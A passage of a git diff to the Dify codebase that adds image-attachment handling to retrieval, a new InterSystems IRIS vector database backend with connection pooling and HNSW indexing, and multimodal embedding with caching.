segment_child_map[segment.id]["max_score"] = max( + segment_child_map[segment.id]["max_score"], document.metadata.get("score", 0.0) + ) + else: + segment_child_map[segment.id] = { + "max_score": document.metadata.get("score", 0.0), + "child_chunks": [child_chunk_detail], + } + if attachment_info: + if segment.id in segment_file_map: + segment_file_map[segment.id].append(attachment_info) + else: + segment_file_map[segment.id] = [attachment_info] else: - child_chunk_detail = { - "id": child_chunk.id, - "content": child_chunk.content, - "position": child_chunk.position, - "score": document.metadata.get("score", 0.0), - } - segment_child_map[segment.id]["child_chunks"].append(child_chunk_detail) - segment_child_map[segment.id]["max_score"] = max( - segment_child_map[segment.id]["max_score"], document.metadata.get("score", 0.0) - ) - else: - # Handle normal documents - index_node_id = document.metadata.get("doc_id") - if not index_node_id: - continue - document_segment_stmt = select(DocumentSegment).where( - DocumentSegment.dataset_id == dataset_document.dataset_id, - DocumentSegment.enabled == True, - DocumentSegment.status == "completed", - DocumentSegment.index_node_id == index_node_id, - ) - segment = db.session.scalar(document_segment_stmt) + # Handle normal documents + segment = None + if document.metadata.get("doc_type") == DocType.IMAGE: + attachment_info_dict = cls.get_segment_attachment_info( + dataset_document.dataset_id, + dataset_document.tenant_id, + document.metadata.get("doc_id") or "", + session, + ) + if attachment_info_dict: + attachment_info = attachment_info_dict["attachment_info"] + segment_id = attachment_info_dict["segment_id"] + document_segment_stmt = select(DocumentSegment).where( + DocumentSegment.dataset_id == dataset_document.dataset_id, + DocumentSegment.enabled == True, + DocumentSegment.status == "completed", + DocumentSegment.id == segment_id, + ) + segment = session.scalar(document_segment_stmt) + if segment: + segment_file_map[segment.id] = [attachment_info] + else: + index_node_id = document.metadata.get("doc_id") + if not index_node_id: + continue + document_segment_stmt = select(DocumentSegment).where( + DocumentSegment.dataset_id == dataset_document.dataset_id, + DocumentSegment.enabled == True, + DocumentSegment.status == "completed", + DocumentSegment.index_node_id == index_node_id, + ) + segment = session.scalar(document_segment_stmt) - if not segment: - continue - - include_segment_ids.add(segment.id) - record = { - "segment": segment, - "score": document.metadata.get("score"), # type: ignore - } - records.append(record) + if not segment: + continue + if segment.id not in include_segment_ids: + include_segment_ids.add(segment.id) + record = { + "segment": segment, + "score": document.metadata.get("score"), # type: ignore + } + if attachment_info: + segment_file_map[segment.id] = [attachment_info] + records.append(record) + else: + if attachment_info: + attachment_infos = segment_file_map.get(segment.id, []) + if attachment_info not in attachment_infos: + attachment_infos.append(attachment_info) + segment_file_map[segment.id] = attachment_infos # Add child chunks information to records for record in records: if record["segment"].id in segment_child_map: record["child_chunks"] = segment_child_map[record["segment"].id].get("child_chunks") # type: ignore record["score"] = segment_child_map[record["segment"].id]["max_score"] + if record["segment"].id in segment_file_map: + record["files"] = segment_file_map[record["segment"].id] # type: ignore[assignment] result = [] for record in records: @@ -447,6 +536,11 @@ class RetrievalService: if not isinstance(child_chunks, list): child_chunks = None + # Extract files, ensuring it's a list or None + files = record.get("files") + if not isinstance(files, list): + files = None + # Extract score, ensuring it's a float or None score_value = record.get("score") score = ( @@ -456,10 +550,149 @@ class RetrievalService: ) # Create RetrievalSegments object - retrieval_segment = RetrievalSegments(segment=segment, child_chunks=child_chunks, score=score) + retrieval_segment = RetrievalSegments( + segment=segment, child_chunks=child_chunks, score=score, files=files + ) result.append(retrieval_segment) return result except Exception as e: db.session.rollback() raise e + + def _retrieve( + self, + flask_app: Flask, + retrieval_method: RetrievalMethod, + dataset: Dataset, + query: str | None = None, + top_k: int = 4, + score_threshold: float | None = 0.0, + reranking_model: dict | None = None, + reranking_mode: str = "reranking_model", + weights: dict | None = None, + document_ids_filter: list[str] | None = None, + attachment_id: str | None = None, + all_documents: list[Document] = [], + exceptions: list[str] = [], + ): + if not query and not attachment_id: + return + with flask_app.app_context(): + all_documents_item: list[Document] = [] + # Optimize multithreading with thread pools + with ThreadPoolExecutor(max_workers=dify_config.RETRIEVAL_SERVICE_EXECUTORS) as executor: # type: ignore + futures = [] + if retrieval_method == RetrievalMethod.KEYWORD_SEARCH and query: + futures.append( + executor.submit( + self.keyword_search, + flask_app=current_app._get_current_object(), # type: ignore + dataset_id=dataset.id, + query=query, + top_k=top_k, + all_documents=all_documents_item, + exceptions=exceptions, + document_ids_filter=document_ids_filter, + ) + ) + if RetrievalMethod.is_support_semantic_search(retrieval_method): + if query: + futures.append( + executor.submit( + self.embedding_search, + flask_app=current_app._get_current_object(), # type: ignore + dataset_id=dataset.id, + query=query, + top_k=top_k, + score_threshold=score_threshold, + reranking_model=reranking_model, + all_documents=all_documents_item, + retrieval_method=retrieval_method, + exceptions=exceptions, + document_ids_filter=document_ids_filter, + query_type=QueryType.TEXT_QUERY, + ) + ) + if attachment_id: + futures.append( + executor.submit( + self.embedding_search, + flask_app=current_app._get_current_object(), # type: ignore + dataset_id=dataset.id, + query=attachment_id, + top_k=top_k, + score_threshold=score_threshold, + reranking_model=reranking_model, + all_documents=all_documents_item, + retrieval_method=retrieval_method, + exceptions=exceptions, + document_ids_filter=document_ids_filter, + query_type=QueryType.IMAGE_QUERY, + ) + ) + if RetrievalMethod.is_support_fulltext_search(retrieval_method) and query: + futures.append( + executor.submit( + self.full_text_index_search, + flask_app=current_app._get_current_object(), # type: ignore + dataset_id=dataset.id, + query=query, + top_k=top_k, + score_threshold=score_threshold, + reranking_model=reranking_model, + all_documents=all_documents_item, + retrieval_method=retrieval_method, + exceptions=exceptions, + document_ids_filter=document_ids_filter, + ) + ) + concurrent.futures.wait(futures, timeout=300, return_when=concurrent.futures.ALL_COMPLETED) + + if exceptions: + raise ValueError(";\n".join(exceptions)) + + # Deduplicate documents for hybrid search to avoid duplicate chunks + if retrieval_method == RetrievalMethod.HYBRID_SEARCH: + if attachment_id and reranking_mode == RerankMode.WEIGHTED_SCORE: + all_documents.extend(all_documents_item) + all_documents_item = self._deduplicate_documents(all_documents_item) + data_post_processor = DataPostProcessor( + str(dataset.tenant_id), reranking_mode, reranking_model, weights, False + ) + + query = query or attachment_id + if not query: + return + all_documents_item = data_post_processor.invoke( + query=query, + documents=all_documents_item, + score_threshold=score_threshold, + top_n=top_k, + query_type=QueryType.TEXT_QUERY if query else QueryType.IMAGE_QUERY, + ) + + all_documents.extend(all_documents_item) + + @classmethod + def get_segment_attachment_info( + cls, dataset_id: str, tenant_id: str, attachment_id: str, session: Session + ) -> dict[str, Any] | None: + upload_file = session.query(UploadFile).where(UploadFile.id == attachment_id).first() + if upload_file: + attachment_binding = ( + session.query(SegmentAttachmentBinding) + .where(SegmentAttachmentBinding.attachment_id == upload_file.id) + .first() + ) + if attachment_binding: + attachment_info = { + "id": upload_file.id, + "name": upload_file.name, + "extension": "." + upload_file.extension, + "mime_type": upload_file.mime_type, + "source_url": sign_upload_file(upload_file.id, upload_file.extension), + "size": upload_file.size, + } + return {"attachment_info": attachment_info, "segment_id": attachment_binding.segment_id} + return None diff --git a/api/core/rag/datasource/vdb/iris/__init__.py b/api/core/rag/datasource/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/rag/datasource/vdb/iris/iris_vector.py b/api/core/rag/datasource/vdb/iris/iris_vector.py new file mode 100644 index 0000000000..b1bfabb76e --- /dev/null +++ b/api/core/rag/datasource/vdb/iris/iris_vector.py @@ -0,0 +1,407 @@ +"""InterSystems IRIS vector database implementation for Dify. + +This module provides vector storage and retrieval using IRIS native VECTOR type +with HNSW indexing for efficient similarity search. +""" + +from __future__ import annotations + +import json +import logging +import threading +import uuid +from contextlib import contextmanager +from typing import TYPE_CHECKING, Any + +from configs import dify_config +from configs.middleware.vdb.iris_config import IrisVectorConfig +from core.rag.datasource.vdb.vector_base import BaseVector +from core.rag.datasource.vdb.vector_factory import AbstractVectorFactory +from core.rag.datasource.vdb.vector_type import VectorType +from core.rag.embedding.embedding_base import Embeddings +from core.rag.models.document import Document +from extensions.ext_redis import redis_client +from models.dataset import Dataset + +if TYPE_CHECKING: + import iris +else: + try: + import iris + except ImportError: + iris = None # type: ignore[assignment] + +logger = logging.getLogger(__name__) + +# Singleton connection pool to minimize IRIS license usage +_pool_lock = threading.Lock() +_pool_instance: IrisConnectionPool | None = None + + +def get_iris_pool(config: IrisVectorConfig) -> IrisConnectionPool: + """Get or create the global IRIS connection pool (singleton pattern).""" + global _pool_instance # pylint: disable=global-statement + with _pool_lock: + if _pool_instance is None: + logger.info("Initializing IRIS connection pool") + _pool_instance = IrisConnectionPool(config) + return _pool_instance + + +class IrisConnectionPool: + """Thread-safe connection pool for IRIS database.""" + + def __init__(self, config: IrisVectorConfig) -> None: + self.config = config + self._pool: list[Any] = [] + self._lock = threading.Lock() + self._min_size = config.IRIS_MIN_CONNECTION + self._max_size = config.IRIS_MAX_CONNECTION + self._in_use = 0 + self._schemas_initialized: set[str] = set() # Cache for initialized schemas + self._initialize_pool() + + def _initialize_pool(self) -> None: + for _ in range(self._min_size): + self._pool.append(self._create_connection()) + + def _create_connection(self) -> Any: + return iris.connect( + hostname=self.config.IRIS_HOST, + port=self.config.IRIS_SUPER_SERVER_PORT, + namespace=self.config.IRIS_DATABASE, + username=self.config.IRIS_USER, + password=self.config.IRIS_PASSWORD, + ) + + def get_connection(self) -> Any: + """Get a connection from pool or create new if available.""" + with self._lock: + if self._pool: + conn = self._pool.pop() + self._in_use += 1 + return conn + if self._in_use < self._max_size: + conn = self._create_connection() + self._in_use += 1 + return conn + raise RuntimeError("Connection pool exhausted") + + def return_connection(self, conn: Any) -> None: + """Return connection to pool after validating it.""" + if not conn: + return + + # Validate connection health + is_valid = False + try: + cursor = conn.cursor() + cursor.execute("SELECT 1") + cursor.close() + is_valid = True + except (OSError, RuntimeError) as e: + logger.debug("Connection validation failed: %s", e) + try: + conn.close() + except (OSError, RuntimeError): + pass + + with self._lock: + self._pool.append(conn if is_valid else self._create_connection()) + self._in_use -= 1 + + def ensure_schema_exists(self, schema: str) -> None: + """Ensure schema exists in IRIS database. + + This method is idempotent and thread-safe. It uses a memory cache to avoid + redundant database queries for already-verified schemas. + + Args: + schema: Schema name to ensure exists + + Raises: + Exception: If schema creation fails + """ + # Fast path: check cache first (no lock needed for read-only set lookup) + if schema in self._schemas_initialized: + return + + # Slow path: acquire lock and check again (double-checked locking) + with self._lock: + if schema in self._schemas_initialized: + return + + # Get a connection to check/create schema + conn = self._pool[0] if self._pool else self._create_connection() + cursor = conn.cursor() + try: + # Check if schema exists using INFORMATION_SCHEMA + check_sql = """ + SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA + WHERE SCHEMA_NAME = ? + """ + cursor.execute(check_sql, (schema,)) # Must be tuple or list + exists = cursor.fetchone()[0] > 0 + + if not exists: + # Schema doesn't exist, create it + cursor.execute(f"CREATE SCHEMA {schema}") + conn.commit() + logger.info("Created schema: %s", schema) + else: + logger.debug("Schema already exists: %s", schema) + + # Add to cache to skip future checks + self._schemas_initialized.add(schema) + + except Exception as e: + conn.rollback() + logger.exception("Failed to ensure schema %s exists", schema) + raise + finally: + cursor.close() + + def close_all(self) -> None: + """Close all connections (application shutdown only).""" + with self._lock: + for conn in self._pool: + try: + conn.close() + except (OSError, RuntimeError): + pass + self._pool.clear() + self._in_use = 0 + self._schemas_initialized.clear() + + +class IrisVector(BaseVector): + """IRIS vector database implementation using native VECTOR type and HNSW indexing.""" + + def __init__(self, collection_name: str, config: IrisVectorConfig) -> None: + super().__init__(collection_name) + self.config = config + self.table_name = f"embedding_{collection_name}".upper() + self.schema = config.IRIS_SCHEMA or "dify" + self.pool = get_iris_pool(config) + + def get_type(self) -> str: + return VectorType.IRIS + + @contextmanager + def _get_cursor(self): + """Context manager for database cursor with connection pooling.""" + conn = self.pool.get_connection() + cursor = conn.cursor() + try: + yield cursor + conn.commit() + except Exception: + conn.rollback() + raise + finally: + cursor.close() + self.pool.return_connection(conn) + + def create(self, texts: list[Document], embeddings: list[list[float]], **kwargs) -> list[str]: + dimension = len(embeddings[0]) + self._create_collection(dimension) + return self.add_texts(texts, embeddings) + + def add_texts(self, documents: list[Document], embeddings: list[list[float]], **_kwargs) -> list[str]: + """Add documents with embeddings to the collection.""" + added_ids = [] + with self._get_cursor() as cursor: + for i, doc in enumerate(documents): + doc_id = doc.metadata.get("doc_id", str(uuid.uuid4())) if doc.metadata else str(uuid.uuid4()) + metadata = json.dumps(doc.metadata) if doc.metadata else "{}" + embedding_str = json.dumps(embeddings[i]) + + sql = f"INSERT INTO {self.schema}.{self.table_name} (id, text, meta, embedding) VALUES (?, ?, ?, ?)" + cursor.execute(sql, (doc_id, doc.page_content, metadata, embedding_str)) + added_ids.append(doc_id) + + return added_ids + + def text_exists(self, id: str) -> bool: # pylint: disable=redefined-builtin + try: + with self._get_cursor() as cursor: + sql = f"SELECT 1 FROM {self.schema}.{self.table_name} WHERE id = ?" + cursor.execute(sql, (id,)) + return cursor.fetchone() is not None + except (OSError, RuntimeError, ValueError): + return False + + def delete_by_ids(self, ids: list[str]) -> None: + if not ids: + return + + with self._get_cursor() as cursor: + placeholders = ",".join(["?" for _ in ids]) + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE id IN ({placeholders})" + cursor.execute(sql, ids) + + def delete_by_metadata_field(self, key: str, value: str) -> None: + """Delete documents by metadata field (JSON LIKE pattern matching).""" + with self._get_cursor() as cursor: + pattern = f'%"{key}": "{value}"%' + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE meta LIKE ?" + cursor.execute(sql, (pattern,)) + + def search_by_vector(self, query_vector: list[float], **kwargs: Any) -> list[Document]: + """Search similar documents using VECTOR_COSINE with HNSW index.""" + top_k = kwargs.get("top_k", 4) + score_threshold = float(kwargs.get("score_threshold") or 0.0) + embedding_str = json.dumps(query_vector) + + with self._get_cursor() as cursor: + sql = f""" + SELECT TOP {top_k} id, text, meta, VECTOR_COSINE(embedding, ?) as score + FROM {self.schema}.{self.table_name} + ORDER BY score DESC + """ + cursor.execute(sql, (embedding_str,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 4: + text, meta_str, score = row[1], row[2], float(row[3]) + if score >= score_threshold: + metadata = json.loads(meta_str) if meta_str else {} + metadata["score"] = score + docs.append(Document(page_content=text, metadata=metadata)) + return docs + + def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]: + """Search documents by full-text using iFind index or fallback to LIKE search.""" + top_k = kwargs.get("top_k", 5) + + with self._get_cursor() as cursor: + if self.config.IRIS_TEXT_INDEX: + # Use iFind full-text search with index + text_index_name = f"idx_{self.table_name}_text" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE %ID %FIND search_index({text_index_name}, ?) + """ + cursor.execute(sql, (query,)) + else: + # Fallback to LIKE search (inefficient for large datasets) + query_pattern = f"%{query}%" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE text LIKE ? + """ + cursor.execute(sql, (query_pattern,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 3: + metadata = json.loads(row[2]) if row[2] else {} + docs.append(Document(page_content=row[1], metadata=metadata)) + + if not docs: + logger.info("Full-text search for '%s' returned no results", query) + + return docs + + def delete(self) -> None: + """Delete the entire collection (drop table - permanent).""" + with self._get_cursor() as cursor: + sql = f"DROP TABLE {self.schema}.{self.table_name}" + cursor.execute(sql) + + def _create_collection(self, dimension: int) -> None: + """Create table with VECTOR column and HNSW index. + + Uses Redis lock to prevent concurrent creation attempts across multiple + API server instances (api, worker, worker_beat). + """ + cache_key = f"vector_indexing_{self._collection_name}" + lock_name = f"{cache_key}_lock" + + with redis_client.lock(lock_name, timeout=20): # pylint: disable=not-context-manager + if redis_client.get(cache_key): + return + + # Ensure schema exists (idempotent, cached after first call) + self.pool.ensure_schema_exists(self.schema) + + with self._get_cursor() as cursor: + # Create table with VECTOR column + sql = f""" + CREATE TABLE {self.schema}.{self.table_name} ( + id VARCHAR(255) PRIMARY KEY, + text CLOB, + meta CLOB, + embedding VECTOR(DOUBLE, {dimension}) + ) + """ + logger.info("Creating table: %s.%s", self.schema, self.table_name) + cursor.execute(sql) + + # Create HNSW index for vector similarity search + index_name = f"idx_{self.table_name}_embedding" + sql_index = ( + f"CREATE INDEX {index_name} ON {self.schema}.{self.table_name} " + "(embedding) AS HNSW(Distance='Cosine')" + ) + logger.info("Creating HNSW index: %s", index_name) + cursor.execute(sql_index) + logger.info("HNSW index created successfully: %s", index_name) + + # Create full-text search index if enabled + logger.info( + "IRIS_TEXT_INDEX config value: %s (type: %s)", + self.config.IRIS_TEXT_INDEX, + type(self.config.IRIS_TEXT_INDEX), + ) + if self.config.IRIS_TEXT_INDEX: + text_index_name = f"idx_{self.table_name}_text" + language = self.config.IRIS_TEXT_INDEX_LANGUAGE + # Fixed: Removed extra parentheses and corrected syntax + sql_text_index = f""" + CREATE INDEX {text_index_name} ON {self.schema}.{self.table_name} (text) + AS %iFind.Index.Basic + (LANGUAGE = '{language}', LOWER = 1, INDEXOPTION = 0) + """ + logger.info("Creating text index: %s with language: %s", text_index_name, language) + logger.info("SQL for text index: %s", sql_text_index) + cursor.execute(sql_text_index) + logger.info("Text index created successfully: %s", text_index_name) + else: + logger.warning("Text index creation skipped - IRIS_TEXT_INDEX is disabled") + + redis_client.set(cache_key, 1, ex=3600) + + +class IrisVectorFactory(AbstractVectorFactory): + """Factory for creating IrisVector instances.""" + + def init_vector(self, dataset: Dataset, attributes: list, embeddings: Embeddings) -> IrisVector: + if dataset.index_struct_dict: + class_prefix: str = dataset.index_struct_dict["vector_store"]["class_prefix"] + collection_name = class_prefix + else: + dataset_id = dataset.id + collection_name = Dataset.gen_collection_name_by_id(dataset_id) + index_struct_dict = self.gen_index_struct_dict(VectorType.IRIS, collection_name) + dataset.index_struct = json.dumps(index_struct_dict) + + return IrisVector( + collection_name=collection_name, + config=IrisVectorConfig( + IRIS_HOST=dify_config.IRIS_HOST, + IRIS_SUPER_SERVER_PORT=dify_config.IRIS_SUPER_SERVER_PORT, + IRIS_USER=dify_config.IRIS_USER, + IRIS_PASSWORD=dify_config.IRIS_PASSWORD, + IRIS_DATABASE=dify_config.IRIS_DATABASE, + IRIS_SCHEMA=dify_config.IRIS_SCHEMA, + IRIS_CONNECTION_URL=dify_config.IRIS_CONNECTION_URL, + IRIS_MIN_CONNECTION=dify_config.IRIS_MIN_CONNECTION, + IRIS_MAX_CONNECTION=dify_config.IRIS_MAX_CONNECTION, + IRIS_TEXT_INDEX=dify_config.IRIS_TEXT_INDEX, + IRIS_TEXT_INDEX_LANGUAGE=dify_config.IRIS_TEXT_INDEX_LANGUAGE, + ), + ) diff --git a/api/core/rag/datasource/vdb/vector_factory.py b/api/core/rag/datasource/vdb/vector_factory.py index 0beb388693..b9772b3c08 100644 --- a/api/core/rag/datasource/vdb/vector_factory.py +++ b/api/core/rag/datasource/vdb/vector_factory.py @@ -1,3 +1,4 @@ +import base64 import logging import time from abc import ABC, abstractmethod @@ -12,10 +13,13 @@ from core.rag.datasource.vdb.vector_base import BaseVector from core.rag.datasource.vdb.vector_type import VectorType from core.rag.embedding.cached_embedding import CacheEmbedding from core.rag.embedding.embedding_base import Embeddings +from core.rag.index_processor.constant.doc_type import DocType from core.rag.models.document import Document from extensions.ext_database import db from extensions.ext_redis import redis_client +from extensions.ext_storage import storage from models.dataset import Dataset, Whitelist +from models.model import UploadFile logger = logging.getLogger(__name__) @@ -159,7 +163,7 @@ class Vector: from core.rag.datasource.vdb.lindorm.lindorm_vector import LindormVectorStoreFactory return LindormVectorStoreFactory - case VectorType.OCEANBASE: + case VectorType.OCEANBASE | VectorType.SEEKDB: from core.rag.datasource.vdb.oceanbase.oceanbase_vector import OceanBaseVectorFactory return OceanBaseVectorFactory @@ -183,6 +187,10 @@ class Vector: from core.rag.datasource.vdb.clickzetta.clickzetta_vector import ClickzettaVectorFactory return ClickzettaVectorFactory + case VectorType.IRIS: + from core.rag.datasource.vdb.iris.iris_vector import IrisVectorFactory + + return IrisVectorFactory case _: raise ValueError(f"Vector store {vector_type} is not supported.") @@ -203,6 +211,47 @@ class Vector: self._vector_processor.create(texts=batch, embeddings=batch_embeddings, **kwargs) logger.info("Embedding %s texts took %s s", len(texts), time.time() - start) + def create_multimodal(self, file_documents: list | None = None, **kwargs): + if file_documents: + start = time.time() + logger.info("start embedding %s files %s", len(file_documents), start) + batch_size = 1000 + total_batches = len(file_documents) + batch_size - 1 + for i in range(0, len(file_documents), batch_size): + batch = file_documents[i : i + batch_size] + batch_start = time.time() + logger.info("Processing batch %s/%s (%s files)", i // batch_size + 1, total_batches, len(batch)) + + # Batch query all upload files to avoid N+1 queries + attachment_ids = [doc.metadata["doc_id"] for doc in batch] + stmt = select(UploadFile).where(UploadFile.id.in_(attachment_ids)) + upload_files = db.session.scalars(stmt).all() + upload_file_map = {str(f.id): f for f in upload_files} + + file_base64_list = [] + real_batch = [] + for document in batch: + attachment_id = document.metadata["doc_id"] + doc_type = document.metadata["doc_type"] + upload_file = upload_file_map.get(attachment_id) + if upload_file: + blob = storage.load_once(upload_file.key) + file_base64_str = base64.b64encode(blob).decode() + file_base64_list.append( + { + "content": file_base64_str, + "content_type": doc_type, + "file_id": attachment_id, + } + ) + real_batch.append(document) + batch_embeddings = self._embeddings.embed_multimodal_documents(file_base64_list) + logger.info( + "Embedding batch %s/%s took %s s", i // batch_size + 1, total_batches, time.time() - batch_start + ) + self._vector_processor.create(texts=real_batch, embeddings=batch_embeddings, **kwargs) + logger.info("Embedding %s files took %s s", len(file_documents), time.time() - start) + def add_texts(self, documents: list[Document], **kwargs): if kwargs.get("duplicate_check", False): documents = self._filter_duplicate_texts(documents) @@ -223,6 +272,22 @@ class Vector: query_vector = self._embeddings.embed_query(query) return self._vector_processor.search_by_vector(query_vector, **kwargs) + def search_by_file(self, file_id: str, **kwargs: Any) -> list[Document]: + upload_file: UploadFile | None = db.session.query(UploadFile).where(UploadFile.id == file_id).first() + + if not upload_file: + return [] + blob = storage.load_once(upload_file.key) + file_base64_str = base64.b64encode(blob).decode() + multimodal_vector = self._embeddings.embed_multimodal_query( + { + "content": file_base64_str, + "content_type": DocType.IMAGE, + "file_id": file_id, + } + ) + return self._vector_processor.search_by_vector(multimodal_vector, **kwargs) + def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]: return self._vector_processor.search_by_full_text(query, **kwargs) diff --git a/api/core/rag/datasource/vdb/vector_type.py b/api/core/rag/datasource/vdb/vector_type.py index bc7d93a2e0..bd99a31446 100644 --- a/api/core/rag/datasource/vdb/vector_type.py +++ b/api/core/rag/datasource/vdb/vector_type.py @@ -27,8 +27,10 @@ class VectorType(StrEnum): UPSTASH = "upstash" TIDB_ON_QDRANT = "tidb_on_qdrant" OCEANBASE = "oceanbase" + SEEKDB = "seekdb" OPENGAUSS = "opengauss" TABLESTORE = "tablestore" HUAWEI_CLOUD = "huawei_cloud" MATRIXONE = "matrixone" CLICKZETTA = "clickzetta" + IRIS = "iris" diff --git a/api/core/rag/datasource/vdb/weaviate/weaviate_vector.py b/api/core/rag/datasource/vdb/weaviate/weaviate_vector.py index 2c7bc592c0..84d1e26b34 100644 --- a/api/core/rag/datasource/vdb/weaviate/weaviate_vector.py +++ b/api/core/rag/datasource/vdb/weaviate/weaviate_vector.py @@ -79,6 +79,18 @@ class WeaviateVector(BaseVector): self._client = self._init_client(config) self._attributes = attributes + def __del__(self): + """ + Destructor to properly close the Weaviate client connection. + Prevents connection leaks and resource warnings. + """ + if hasattr(self, "_client") and self._client is not None: + try: + self._client.close() + except Exception as e: + # Ignore errors during cleanup as object is being destroyed + logger.warning("Error closing Weaviate client %s", e, exc_info=True) + def _init_client(self, config: WeaviateConfig) -> weaviate.WeaviateClient: """ Initializes and returns a connected Weaviate client. diff --git a/api/core/rag/docstore/dataset_docstore.py b/api/core/rag/docstore/dataset_docstore.py index 74a2653e9d..1fe74d3042 100644 --- a/api/core/rag/docstore/dataset_docstore.py +++ b/api/core/rag/docstore/dataset_docstore.py @@ -5,9 +5,9 @@ from sqlalchemy import func, select from core.model_manager import ModelManager from core.model_runtime.entities.model_entities import ModelType -from core.rag.models.document import Document +from core.rag.models.document import AttachmentDocument, Document from extensions.ext_database import db -from models.dataset import ChildChunk, Dataset, DocumentSegment +from models.dataset import ChildChunk, Dataset, DocumentSegment, SegmentAttachmentBinding class DatasetDocumentStore: @@ -120,6 +120,9 @@ class DatasetDocumentStore: db.session.add(segment_document) db.session.flush() + self.add_multimodel_documents_binding( + segment_id=segment_document.id, multimodel_documents=doc.attachments + ) if save_child: if doc.children: for position, child in enumerate(doc.children, start=1): @@ -144,6 +147,9 @@ class DatasetDocumentStore: segment_document.index_node_hash = doc.metadata.get("doc_hash") segment_document.word_count = len(doc.page_content) segment_document.tokens = tokens + self.add_multimodel_documents_binding( + segment_id=segment_document.id, multimodel_documents=doc.attachments + ) if save_child and doc.children: # delete the existing child chunks db.session.query(ChildChunk).where( @@ -233,3 +239,15 @@ class DatasetDocumentStore: document_segment = db.session.scalar(stmt) return document_segment + + def add_multimodel_documents_binding(self, segment_id: str, multimodel_documents: list[AttachmentDocument] | None): + if multimodel_documents: + for multimodel_document in multimodel_documents: + binding = SegmentAttachmentBinding( + tenant_id=self._dataset.tenant_id, + dataset_id=self._dataset.id, + document_id=self._document_id, + segment_id=segment_id, + attachment_id=multimodel_document.metadata["doc_id"], + ) + db.session.add(binding) diff --git a/api/core/rag/embedding/cached_embedding.py b/api/core/rag/embedding/cached_embedding.py index 7fb20c1941..3cbc7db75d 100644 --- a/api/core/rag/embedding/cached_embedding.py +++ b/api/core/rag/embedding/cached_embedding.py @@ -104,6 +104,88 @@ class CacheEmbedding(Embeddings): return text_embeddings + def embed_multimodal_documents(self, multimodel_documents: list[dict]) -> list[list[float]]: + """Embed file documents.""" + # use doc embedding cache or store if not exists + multimodel_embeddings: list[Any] = [None for _ in range(len(multimodel_documents))] + embedding_queue_indices = [] + for i, multimodel_document in enumerate(multimodel_documents): + file_id = multimodel_document["file_id"] + embedding = ( + db.session.query(Embedding) + .filter_by( + model_name=self._model_instance.model, hash=file_id, provider_name=self._model_instance.provider + ) + .first() + ) + if embedding: + multimodel_embeddings[i] = embedding.get_embedding() + else: + embedding_queue_indices.append(i) + + # NOTE: avoid closing the shared scoped session here; downstream code may still have pending work + + if embedding_queue_indices: + embedding_queue_multimodel_documents = [multimodel_documents[i] for i in embedding_queue_indices] + embedding_queue_embeddings = [] + try: + model_type_instance = cast(TextEmbeddingModel, self._model_instance.model_type_instance) + model_schema = model_type_instance.get_model_schema( + self._model_instance.model, self._model_instance.credentials + ) + max_chunks = ( + model_schema.model_properties[ModelPropertyKey.MAX_CHUNKS] + if model_schema and ModelPropertyKey.MAX_CHUNKS in model_schema.model_properties + else 1 + ) + for i in range(0, len(embedding_queue_multimodel_documents), max_chunks): + batch_multimodel_documents = embedding_queue_multimodel_documents[i : i + max_chunks] + + embedding_result = self._model_instance.invoke_multimodal_embedding( + multimodel_documents=batch_multimodel_documents, + user=self._user, + input_type=EmbeddingInputType.DOCUMENT, + ) + + for vector in embedding_result.embeddings: + try: + # FIXME: type ignore for numpy here + normalized_embedding = (vector / np.linalg.norm(vector)).tolist() # type: ignore + # stackoverflow best way: https://stackoverflow.com/questions/20319813/how-to-check-list-containing-nan + if np.isnan(normalized_embedding).any(): + # for issue #11827 float values are not json compliant + logger.warning("Normalized embedding is nan: %s", normalized_embedding) + continue + embedding_queue_embeddings.append(normalized_embedding) + except IntegrityError: + db.session.rollback() + except Exception: + logger.exception("Failed transform embedding") + cache_embeddings = [] + try: + for i, n_embedding in zip(embedding_queue_indices, embedding_queue_embeddings): + multimodel_embeddings[i] = n_embedding + file_id = multimodel_documents[i]["file_id"] + if file_id not in cache_embeddings: + embedding_cache = Embedding( + model_name=self._model_instance.model, + hash=file_id, + provider_name=self._model_instance.provider, + embedding=pickle.dumps(n_embedding, protocol=pickle.HIGHEST_PROTOCOL), + ) + embedding_cache.set_embedding(n_embedding) + db.session.add(embedding_cache) + cache_embeddings.append(file_id) + db.session.commit() + except IntegrityError: + db.session.rollback() + except Exception as ex: + db.session.rollback() + logger.exception("Failed to embed documents") + raise ex + + return multimodel_embeddings + def embed_query(self, text: str) -> list[float]: """Embed query text.""" # use doc embedding cache or store if not exists @@ -146,3 +228,46 @@ class CacheEmbedding(Embeddings): raise ex return embedding_results # type: ignore + + def embed_multimodal_query(self, multimodel_document: dict) -> list[float]: + """Embed multimodal documents.""" + # use doc embedding cache or store if not exists + file_id = multimodel_document["file_id"] + embedding_cache_key = f"{self._model_instance.provider}_{self._model_instance.model}_{file_id}" + embedding = redis_client.get(embedding_cache_key) + if embedding: + redis_client.expire(embedding_cache_key, 600) + decoded_embedding = np.frombuffer(base64.b64decode(embedding), dtype="float") + return [float(x) for x in decoded_embedding] + try: + embedding_result = self._model_instance.invoke_multimodal_embedding( + multimodel_documents=[multimodel_document], user=self._user, input_type=EmbeddingInputType.QUERY + ) + + embedding_results = embedding_result.embeddings[0] + # FIXME: type ignore for numpy here + embedding_results = (embedding_results / np.linalg.norm(embedding_results)).tolist() # type: ignore + if np.isnan(embedding_results).any(): + raise ValueError("Normalized embedding is nan please try again") + except Exception as ex: + if dify_config.DEBUG: + logger.exception("Failed to embed multimodal document '%s'", multimodel_document["file_id"]) + raise ex + + try: + # encode embedding to base64 + embedding_vector = np.array(embedding_results) + vector_bytes = embedding_vector.tobytes() + # Transform to Base64 + encoded_vector = base64.b64encode(vector_bytes) + # Transform to string + encoded_str = encoded_vector.decode("utf-8") + redis_client.setex(embedding_cache_key, 600, encoded_str) + except Exception as ex: + if dify_config.DEBUG: + logger.exception( + "Failed to add embedding to redis for the multimodal document '%s'", multimodel_document["file_id"] + ) + raise ex + + return embedding_results # type: ignore diff --git 